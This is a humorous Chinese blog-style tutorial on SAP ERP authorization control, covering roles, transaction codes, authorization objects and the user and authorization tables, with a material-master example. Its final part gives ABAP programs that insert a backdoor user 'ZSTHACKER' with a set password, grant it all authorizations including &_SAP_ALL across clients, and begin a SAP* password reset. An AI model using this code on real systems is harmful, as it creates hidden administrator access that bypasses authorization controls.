大話ERP權(quán)限控制

1、ERP權(quán)限控制在這一節(jié)，大話一下ERP的權(quán)限設(shè)計(jì)，讓大家開(kāi)心之余了解權(quán)限設(shè)計(jì)的邏輯。一個(gè)特別是適合大集團(tuán)業(yè)務(wù)的ERP系統(tǒng),應(yīng)該提供一個(gè)非常完善的權(quán)限控制機(jī)制,甚至允許將權(quán)限控制字段細(xì)到字段級(jí)別，如果連基本的權(quán)限控制都做不到這點(diǎn)，估計(jì)您家的“ERP”產(chǎn)品就只能是小打小鬧小折騰，小打小鬧緊巴巴過(guò)日子可不大好過(guò)呀，N年以前，我曾做過(guò)國(guó)內(nèi)某 ERP的維護(hù)+售前,某次,終于好不容易廢了兩斤半口水才談妥一個(gè)單子,就小小的幾千元錢(qián),結(jié)果用戶(hù)還拿著菜刀過(guò)來(lái)砍價(jià),說(shuō),能再優(yōu)惠一點(diǎn)就買(mǎi)了,我心中盤(pán)算了一番,這單下來(lái)那點(diǎn)可憐的獎(jiǎng)金,再加上我那無(wú)顏拿出來(lái)曬的3位數(shù)的”口糧”(薪水),應(yīng)該要到60歲左右能賺到我家鄉(xiāng)的父

2、老鄉(xiāng)親常說(shuō)的年輕小伙子必須要攢的LP本，想到此，俺心里流下了辛酸的眼淚，祈禱說(shuō)，主呀，神仙JJ呀，你們?cè)谀睦锘斡疲恐餮?，給個(gè)發(fā)財(cái)?shù)臋C(jī)會(huì)吧，神仙JJ，賜個(gè)MM做GF吧。經(jīng)過(guò)我的認(rèn)真仔細(xì)觀察，我從我那婆娘身上得出一個(gè)大大大大的理論，那就是鉆石白菜理論，我的LP簡(jiǎn)直是太會(huì)“節(jié)省“了，就是去買(mǎi)棵3毛錢(qián)一斤的白菜，她都一定要爭(zhēng)到2毛一斤，順便還能要到小販的幾根小蔥，真是I服了Her，可是她逛珠寶店鋪時(shí)看到鉆戒眼睛發(fā)綠時(shí)卻總會(huì)忘記昂貴的價(jià)格，買(mǎi)一個(gè)丟一個(gè)，現(xiàn)在只要俺和她逛街時(shí)一看見(jiàn)前面有珠寶店時(shí)俺就心里發(fā)毛，立即下意識(shí)捂緊口袋。經(jīng)過(guò)俺精確計(jì)算，丟失一顆鉆戒的損失俺LP得侃大半輩子白菜價(jià)才能挽回。好笑嗎？我

3、們很多企業(yè)和個(gè)人都有這樣的毛病，別看有的企業(yè)平時(shí)摳門(mén)的很，實(shí)施ERP那也是不求產(chǎn)品最適用但求產(chǎn)品最昂貴，貴的就是好的，體面！多年以前，俺在幼兒園時(shí)老師布置的權(quán)限作業(yè)，俺大概是如此設(shè)計(jì)的。Select 用戶(hù)名 From 用戶(hù)表 where 用戶(hù)名='butcher' （得到用戶(hù)名）select權(quán)限組ID From 權(quán)限表 where 用戶(hù)名='butcher' （得到用戶(hù)對(duì)應(yīng)的權(quán)限組ID）select * From 權(quán)限控制列表 where權(quán)限組ID = *（得到?jīng)]個(gè)權(quán)限組ID對(duì)應(yīng)的明細(xì)權(quán)限列表也就是用戶(hù)的明細(xì)權(quán)限）多年以后，俺們有的軟件公司居然還玩這套小把戲。注

4、意：在此我們可看到諸如用戶(hù)名表，角色表，權(quán)限組表和對(duì)應(yīng)業(yè)務(wù)操作的權(quán)限詳細(xì)控制列表諸如此類(lèi)的表格?，F(xiàn)在來(lái)看看ERP的權(quán)限設(shè)計(jì)思路，首先了解下幾個(gè)Tcode和權(quán)限相關(guān)表格。常用權(quán)限相關(guān)Tcode .(一)Role(角色)相關(guān)T-code:PFCG 創(chuàng)建ROLE_CMP 角色比較SUPC 批量建立角色profile(二)建立用戶(hù)SU01 建立用戶(hù)SU01D 顯示用戶(hù)SU2|SU3| SU50|SU51|SU52 改變/顯示用戶(hù)個(gè)人參數(shù)SU10|SU12 批量維護(hù)用戶(hù)SUCOMP維護(hù)用戶(hù)公司地址SUIM 用戶(hù)信息系統(tǒng)（強(qiáng)調(diào)一下）(三)建立用戶(hù)組SUGR| SUGRD_NAV 維護(hù)用戶(hù)組SUGRD| S

5、UGR_NAV 顯示用戶(hù)組 (四)維護(hù)檢查授權(quán)SU20|SU21自定義授權(quán)字段和授權(quán)對(duì)象SU53 當(dāng)出現(xiàn)權(quán)限問(wèn)題可使用它檢測(cè)未授權(quán)對(duì)象.SU56:分析authoraztion data buffers.常用權(quán)限相關(guān)表格:TOBJ : All avaiable authorzation objects.(ERP系統(tǒng)默認(rèn)的所有授權(quán)對(duì)象)USR12: 用戶(hù)級(jí)authoraztion值USR02:User Logon Data(包括用戶(hù)名稱(chēng)密碼,是否鎖住等字段)USR03:User address dataUSR05:User Master Parameter ID(Tcode SU3可查看用戶(hù)參數(shù)文

6、件的參數(shù)ID默認(rèn)值)USR41:當(dāng)前用戶(hù)(即Tcode SM04看到的所有當(dāng)前活動(dòng)用戶(hù),包括各種對(duì)話系統(tǒng)通信類(lèi)用戶(hù))USRBF2:記錄當(dāng)前用戶(hù)所有的授權(quán)objectsUST04:User Profile master(用戶(hù)主數(shù)據(jù)中對(duì)應(yīng)的權(quán)限參數(shù)文件名)UST10S: Single profiles(授權(quán)文件,權(quán)限參數(shù)和授權(quán)對(duì)象對(duì)應(yīng)表)UST12 : Authorizations(具體授權(quán)細(xì)節(jié))重點(diǎn)提示：USR02/USRBF2/UST10S/UST12四個(gè)表包含的信息就是ERP權(quán)限控制的關(guān)鍵，前者是用戶(hù)主數(shù)據(jù)表，后三者和用戶(hù)授權(quán)緊密相關(guān)。我現(xiàn)在來(lái)舉一個(gè)MM01建立物料主數(shù)據(jù)的實(shí)例來(lái)說(shuō)明ERP的

7、權(quán)限控制設(shè)計(jì)思路，步驟如下：第一步：建立角色（Tcode：PFCG）圖1中，假設(shè)建立角色ZMM01。圖1-12：在菜單Tab頁(yè)選擇“事務(wù)“加入MM01->創(chuàng)建物料&,你還可為程序,查詢(xún)這樣的報(bào)表授權(quán)，選擇”其它“還能為數(shù)據(jù)倉(cāng)庫(kù)等對(duì)象設(shè)置權(quán)限角色。圖1-345：到“權(quán)限“Tab頁(yè)看到系統(tǒng)自動(dòng)產(chǎn)生的授權(quán)參數(shù)文件Profilname T-C1550437，然后選擇”更改授權(quán)數(shù)據(jù)“，進(jìn)入圖2。顯然系統(tǒng)并不意味你給了建立物料的權(quán)限就能隨意使用該Tcode了，系統(tǒng)有更嚴(yán)格的細(xì)致控制。圖2-12：我們可以看到建立物料主數(shù)據(jù)的權(quán)限分公司代碼層次，倉(cāng)庫(kù)層次，物料類(lèi)型層次，銷(xiāo)售組織層次，物料組層次，

8、和工廠層次等等，特別是對(duì)于象公司代碼，銷(xiāo)售組織和工廠這樣的組織層次授權(quán)字段，控制點(diǎn)是非常必要的，一個(gè)大集團(tuán)實(shí)施ERP，各公司代碼，各公司代碼下的各Plant授權(quán)用戶(hù)只能建立各自的物料，現(xiàn)在來(lái)看看是如何控制到工廠級(jí)別的。圖2-345：在每個(gè)控制級(jí)別（即權(quán)限控制字段）都分控制字段和作業(yè)，每個(gè)權(quán)限控制字段對(duì)應(yīng)一個(gè)所謂的授權(quán)對(duì)象，工廠的授權(quán)對(duì)象是M_MATE_WRK,所有授權(quán)對(duì)象的作業(yè)統(tǒng)一都是ACTVT,包括01/02/03/06/08五個(gè)作業(yè),即控制是否允許創(chuàng)建更改顯示刪除等。比如MM01的作業(yè)只給03->顯示，則只能顯示物料。注：如果有特殊權(quán)限控制需要，可以使用SU20|SU21自定義授權(quán)字

9、段和授權(quán)對(duì)象圖2-67：點(diǎn)擊“工廠“，進(jìn)去增加工廠權(quán)限，設(shè)置了工廠FRA1，F(xiàn)RA2和一個(gè)工廠范圍FRM1-FRM2。注：如果公司代碼，物料類(lèi)，物料組，工廠等授權(quán)字段選擇*表示允許輸入該字段所有的內(nèi)容。經(jīng)過(guò)我一個(gè)個(gè)點(diǎn)，好不容易，你看到的圖2現(xiàn)在是一片綠色，現(xiàn)在可以按圖2-8按紐生成權(quán)限參數(shù)文件了，這步是必須的。 權(quán)限設(shè)置越細(xì)致，管理員的工作量將越大，據(jù)說(shuō),有一個(gè)項(xiàng)目權(quán)限設(shè)置時(shí)間緊迫,時(shí)間緊呀,Basis兄弟有責(zé)任心呀,人家早上5點(diǎn)鐘就起床開(kāi)始將急著忙著將紅燈點(diǎn)綠,由于點(diǎn)的速度過(guò)快,時(shí)間過(guò)長(zhǎng),結(jié)果呢,硬是將鼠標(biāo)都點(diǎn)的冒起縷縷青煙了。接下來(lái)，使用SU01建立一個(gè)用戶(hù)假設(shè)名叫butcher，然后在此

10、將角色ZMM01分配給它，如圖3，記得要做“用戶(hù)比較“知道該按紐變綠，這和人帶的帽子不同，在角色設(shè)置中，越綠越好，至此，一個(gè)最簡(jiǎn)單的權(quán)限設(shè)置就Ok了，用戶(hù)butcher只能使用MM01在工廠FRA1，F(xiàn)RA1，F(xiàn)RM1，F(xiàn)RM2四個(gè)工廠上建立物料主數(shù)據(jù)?，F(xiàn)在來(lái)檢查USRBF2/UST10S/UST12三個(gè)和用戶(hù)授權(quán)相關(guān)的表格數(shù)據(jù)，如圖4，圖5和圖6。圖4是用戶(hù)參數(shù)文件表USR10S和用戶(hù)授權(quán)表USRBF2的合成圖。圖4-1346： UST10S表的參數(shù)文件T-C1550437正是圖1-4中定義角色ZMM01時(shí)生成的參數(shù)文件，對(duì)象表示的即授權(quán)對(duì)象，每個(gè)授權(quán)對(duì)象對(duì)應(yīng)一個(gè)圖4-6 的權(quán)限名稱(chēng)T-C1

11、55043700| T-C155043701，這倆權(quán)限名稱(chēng)正是參數(shù)文件T-C1550437文件+系號(hào)。圖4-25：用戶(hù)授權(quán)對(duì)象表USRBF2包含了ERP用戶(hù)BUTCHER所對(duì)應(yīng)的（授權(quán)）對(duì)象和對(duì)象對(duì)應(yīng)的權(quán)限名稱(chēng)，現(xiàn)在注意一下USRBF2表用戶(hù)BUTCHER包含了工廠的授權(quán)對(duì)象M_MATE_WRK,其對(duì)應(yīng)的授權(quán)名稱(chēng)是T-C155043700，那么圖2-7設(shè)置的四個(gè)工廠FRA1，F(xiàn)RA1，F(xiàn)RM1，F(xiàn)RM2保存在什么地方呢？請(qǐng)見(jiàn)圖6。為什么一個(gè)參數(shù)文件T-C1550437產(chǎn)生了兩個(gè)T-C155043700| T-C155043701權(quán)限名稱(chēng)呢？查看權(quán)限對(duì)象設(shè)置時(shí)發(fā)現(xiàn)，在倉(cāng)庫(kù)授權(quán)對(duì)象M_MATE_L

12、GN和銷(xiāo)售組織/分銷(xiāo)渠道授權(quán)M_MATE_VKO下系統(tǒng)竟默認(rèn)了兩次相同的授權(quán)作業(yè)，如圖5。圖5表示建立物料主數(shù)據(jù)的倉(cāng)庫(kù)號(hào)和銷(xiāo)售組織/分銷(xiāo)渠道默認(rèn)授權(quán)了兩次。圖6中，可以看到授權(quán)對(duì)象M_MATE_WRK(即工廠授權(quán)對(duì)象)有5條記錄,其中字段ACTVT有01,06兩條,分表表示允許建立和刪除物料數(shù)據(jù),工廠WERKS有三條,正是FRA1,FRA2,和值FRM1到值FRM2，如圖6-23。至此，權(quán)限設(shè)計(jì)的基本邏輯就非常清晰了，如果用戶(hù)BUTCHER要建立某工廠的物料，首先從授權(quán)表中查看是否有M_MATE_WRK的授權(quán)對(duì)象，然后再到UST12去檢查輸入的工廠是否在授權(quán)范圍，If not so，則提示未授

13、權(quán)?，F(xiàn)在用戶(hù)BUTCHER建立物料主數(shù)據(jù)，輸入工廠1000，提示M3 855未授權(quán)處理工廠1000的主數(shù)據(jù)，如圖7。通常有兩種便捷方法查找到權(quán)限控制邏輯，一是SE91輸入M3 855查找，二是直接在物料主數(shù)據(jù)建立程序中查找，一定能看到該主程序的子程序下到處都有象圖7-4的AUTHORITY-CHECK OBJECT 授權(quán)對(duì)象名稱(chēng) ID ACTVT 作業(yè)允許號(hào)ID 授權(quán)字段 FIELD 用戶(hù)輸入內(nèi)容“這樣的權(quán)限檢查邏輯。回顧一下，注意以下三點(diǎn)。1.創(chuàng)建角色Role將產(chǎn)生一個(gè)授權(quán)參數(shù)文件Profiel Name 。2.一個(gè)授權(quán)參數(shù)文件包含許多授權(quán)對(duì)象Authority Objects,實(shí)際上是如果

14、將多個(gè)Tcode或報(bào)表或起其它什么的賦予一個(gè)Role,系統(tǒng)將這些Tcode(或報(bào)表)對(duì)應(yīng)的授權(quán)對(duì)象帶出,這些授權(quán)對(duì)象當(dāng)然在Tcode(報(bào)表對(duì)應(yīng)的)程序邏輯中會(huì)有體現(xiàn),則角色對(duì)應(yīng)的授權(quán)參數(shù)文件將包含這些授權(quán)對(duì)象。3.授權(quán)對(duì)象通常有兩部分組成：一是作業(yè)ACTVT，作業(yè)號(hào)分別是：01創(chuàng)建或生成 02更改03顯示06刪除08顯示修改文檔 二是授權(quán)字段，這些授權(quán)字段通常是諸如組織結(jié)構(gòu)層次的公司代碼，工廠，或其它比如物料類(lèi)型，憑證類(lèi)型等，這樣可以做到更細(xì)微的權(quán)限控制?，F(xiàn)在我們知道，實(shí)際上決定權(quán)限的是授權(quán)對(duì)象Authorization Object，用戶(hù)的授權(quán)對(duì)象表在USRBF2中，所以只要往這個(gè)表插入數(shù)據(jù)

15、就獲得了權(quán)限，現(xiàn)在可以使用SE38建立用戶(hù)和授予權(quán)限。下面的程序ZCRTUSER是建立用戶(hù)ZSTHACKER(初始密碼123qaz)并賦予SAP*用戶(hù)的所有權(quán)限的參考程序.Program ZCRTUSER.Data ZUSR02 like USR02 .*1.Create User ZSTHACKER according to DDICselect single * into ZUSR02 from USR02where BNAME = 'DDIC'.ZUSR02-BNAME = 'ZSTHACKER'.ZUSR02-Bcode = 'E3B796BB0

16、9F7901B' .insert USR02 from ZUSR02 .*2.Copy any auth. Obj from all users data ZUSRBF2 like USRBF2 occurs 0 with header line.select * from USRBF2 into table ZUSRBF2.Loop at ZUSRBF2. ZUSRBF2-BNAME = 'ZSTHACKER' . Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.endloop.INSERT USRBF2 FROM T

17、ABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.如果SAP*可能被刪除,還可直接將TOBJ中包含的所有的ERP授權(quán)對(duì)象全部賦予給一個(gè)用戶(hù)。以下程序ZALLOBJ是賦予所有的標(biāo)準(zhǔn)授權(quán)對(duì)象給用戶(hù)ZSTHACKER 。Program ZALLOBJ。Data Ztobj like tobj occurs 0 with header line .data zusrbf2 like usrbf2.select * into table ztobj from tobj .loop at ztobj. zusrbf2-mandt = sy-mandt. zusrbf2-bname

18、 = 'ZSTHACKER'. zusrbf2-objct = ztobj-objct. zusrbf2-auth ='&_SAP_ALL'. modify USRBF2 FROM zusrbf2 .endloop .也可跨Client建立用戶(hù)和賦予權(quán)限，只要使用client specified就可以。Program ZCLIENT.Data zusrbf2 like usrbf2.Select * into zusrbf2 from usrbf2 where bname = 'SAP*' .Zusrbf2-bname = 'ZSTHACKER' .Zusrbf2-mandt = '100'.Insert into usrbf2 client specified values zusrbf2.Endselect .下面是一句話修改SAP*的密碼為123456的程序，同樣，假設(shè)用戶(hù)BUTCHER的密碼丟失，我只要隨便在一臺(tái)服務(wù)器上建立一個(gè)用戶(hù)也